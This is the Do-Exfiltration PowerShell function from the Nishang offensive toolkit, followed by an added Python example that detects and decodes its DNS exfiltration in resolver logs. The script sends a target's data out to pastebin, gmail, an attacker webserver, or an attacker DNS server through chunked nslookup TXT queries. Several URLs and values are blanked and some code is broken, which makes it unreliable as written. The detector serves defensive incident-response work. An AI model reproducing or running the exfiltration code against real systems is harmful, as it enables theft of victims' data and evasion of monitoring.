e5ad0a4 Oct 2, 2016
@samratashok @FireFart
function Do-Exfiltration
{
<#
.SYNOPSIS
Use this script to exfiltrate data from a target.

.DESCRIPTION
This script could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and DNS methods use Invoke-Decode.ps1
in Utility folder of Nishang.

.PARAMETER Data
The data to be exfiltrated. Could be supplied by pipeline.

.PARAMETER ExfilOption
The method you want to use for exfiltration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".

.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options

.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options

.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options

.PARAMETER URL
The URL of the webserver where POST requests would be sent. The Webserver must be able to log the POST requests.
The encoded values from the webserver could be decoded by using Invoke-Decode from Nishang.

.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to. The DNS Server must log the TXT queries.

.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName. Using it may increase chances of detection.
Usually, you should let the target's Name Server resolve things for you.

.EXAMPLE
PS > Get-Information | Do-Exfiltration -ExfilOption gmail -username <> -Password <>
Use the above command for data exfiltration to gmail.

.EXAMPLE
PS > Do-Exfiltration -Data (Get-Process) -ExfilOption Webserver -URL
Use the above command for data exfiltration to a webserver which logs POST requests.

.EXAMPLE
PS > Get-Information | Do-Exfiltration -ExfilOption DNS -DomainName -AuthNS
Use the above command for data exfiltration to a DNS server which logs TXT queries.
#>
    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
        $Data,

        [Parameter(Position = 1, Mandatory = $True)] [ValidateSet("gmail","pastebin","WebServer","DNS")]
        $ExfilOption,

        [Parameter(Position = 2, Mandatory = $False)]
        $dev_key,

        [Parameter(Position = 3, Mandatory = $False)]
        $username,

        [Parameter(Position = 4, Mandatory = $False)]
        $password,

        [Parameter(Position = 5, Mandatory = $False)]
        $URL,

        [Parameter(Position = 6, Mandatory = $False)]
        $DomainName,

        [Parameter(Position = 7, Mandatory = $False)]
        $AuthNS
    )

    function post_http($url,$parameters)
    {
        $http_request = New-Object -ComObject Msxml2.XMLHTTP
        $http_request.open("POST", $url, $false)
        $http_request.setRequestHeader("Content-length", $parameters.length);
        $http_request.setRequestHeader("Connection", "close")
    }

    function Compress-Encode
    {
        #Compression logic from
        $ms = New-Object IO.MemoryStream
        $action = [IO.Compression.CompressionMode]::Compress
        $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
        $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
        $Data | ForEach-Object {$sw.WriteLine($_)}
        $Compressed = [Convert]::ToBase64String($ms.ToArray())
        return $Compressed
    }

    if ($exfiloption -eq "pastebin")
    {
        $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
        $pastevalue = [System.Convert]::ToBase64String($utfbytes)
        $pastename = "Exfiltrated Data"
        post_http "" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
        post_http "" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
    }
    elseif ($exfiloption -eq "gmail")
    {
        $smtpserver = ""
        $msg = new-object Net.Mail.MailMessage
        $smtp = new-object Net.Mail.SmtpClient($smtpServer )
        $smtp.EnableSsl = $True
        $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
        $msg.From = "$"
        $msg.Subject = "Exfiltrated Data"
        $msg.Body = $Data
        if ($filename)
        {
            $att = new-object Net.Mail.Attachment($filename)
        }
    }
    elseif ($exfiloption -eq "webserver")
    {
        $Data = Compress-Encode
        post_http $URL $Data
    }
    elseif ($ExfilOption -eq "DNS")
    {
        $code = Compress-Encode
        $queries = [int]($code.Length/63)
        while ($queries -ne 0)
        {
            $querystring = $code.Substring($lengthofsubstr,63)
            Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
            $lengthofsubstr += 63
            $queries -= 1
        }
        $mod = $code.Length%63
        $query = $code.Substring($code.Length - $mod, $mod)
        Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
    }
}
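As an added defender-side example (not part of Nishang or of this script), the footprint the DNS option leaves in a resolver's query log can be flagged and the payload reassembled during incident response. The log line format, domain and host names are constructed assumptions; the 63-character label slicing and the raw-DEFLATE-then-base64 encoding are taken from Compress-Encode and the DNS branch above.

```python
import base64
import re
import zlib
from collections import defaultdict

CHUNK = 63  # Do-Exfiltration slices the base64 blob into 63-char labels
# base64 alphabet only; '+', '/' and '=' are not normal hostname characters
B64_LABEL = re.compile(r"^[A-Za-z0-9+/=]+$")


def parse_line(line):
    """Constructed log format (assumption): '<time> <client> <qtype> <qname>'."""
    time, client, qtype, qname = line.split()
    return time, client, qtype, qname.rstrip(".")


def suspicious_clients(lines, domain):
    """Map client -> base64-looking labels it sent as TXT queries under domain.
    Only clients with at least one full 63-char label are reported; that
    length is the signature of the script's chunking loop."""
    labels = defaultdict(list)
    for line in lines:
        _, client, qtype, qname = parse_line(line)
        if qtype != "TXT" or not qname.endswith("." + domain):
            continue
        label = qname[: -(len(domain) + 1)]
        if "." not in label and B64_LABEL.match(label):
            labels[client].append(label)
    return {c: l for c, l in labels.items() if any(len(x) == CHUNK for x in l)}


def reassemble(labels):
    """Undo Compress-Encode for IR: join slices in query order, base64-decode,
    inflate the raw DEFLATE stream (no zlib header, hence wbits=-15)."""
    raw = base64.b64decode("".join(labels))
    return zlib.decompress(raw, wbits=-15).decode("ascii")


def make_sample_log(domain="exfil.example", client="10.0.0.5"):
    """Constructed fixture: the resolver-log footprint the DNS option leaves."""
    text = "\r\n".join(["ComputerName : WS01", "UserName : alice", "Domain : CORP",
                        "OSVersion : 10.0.19045", "IPAddress : 10.0.0.5",
                        "Uptime : 3 days 04:12:55"]) + "\r\n"  # WriteLine output
    z = zlib.compressobj(level=9, wbits=-15)
    code = base64.b64encode(z.compress(text.encode("ascii")) + z.flush()).decode()
    lines = ["09:00:00 10.0.0.7 A www.example.com", "09:00:00 10.0.0.7 TXT _dmarc.example.com"]
    lines += [f"09:00:01 {client} TXT {code[i:i + CHUNK]}.{domain}"
              for i in range(0, len(code), CHUNK)]
    return lines


if __name__ == "__main__":
    for client, labels in suspicious_clients(make_sample_log(), "exfil.example").items():
        print(f"{client}: {len(labels)} TXT chunks\n{reassemble(labels)}")
```

A real deployment would key the detection on the resolver's own log format and on the rate of long TXT queries per client, since the chunk length alone is trivially changed.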